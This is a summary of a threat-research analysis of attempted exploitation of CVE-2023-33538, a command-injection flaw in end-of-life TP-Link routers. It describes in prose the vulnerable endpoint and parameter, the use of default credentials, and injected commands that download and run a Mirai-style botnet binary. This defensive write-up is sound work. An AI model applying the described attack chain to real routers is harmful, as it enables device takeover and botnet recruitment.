A Deep Dive Into Attempted Exploitation of CVE-2023-33538
Unit 42 analyzes active exploitation attempts against CVE-2023-33538, a command-injection flaw in the /userRpm/WlanNetworkRpm(.htm) endpoint on several end-of-life TP-Link routers where the ssid1 parameter is passed to the system without proper sanitization. The observed attacks used HTTP Basic Auth with default admin:admin credentials and injected shell commands to wget an ARM ELF payload into /tmp, chmod 777 it, and execute it with a tplink argument, matching Mirai/Condi-style botnet tradecraft. By emulating TL-WR940N firmware and reversing the downloaded arm7 binary, the researchers found the malware implements a C2 command loop, heartbeat handling, lockdown logic, and an HTTP-server-based update path, but also determined the specific exploit attempts seen in telemetry were flawed and would not succeed as written. The practical takeaway is that the vulnerability is real and still exploitable on unsupported devices, but successful compromise depends on authenticating to the web interface, making default or weak router credentials the key enabling factor.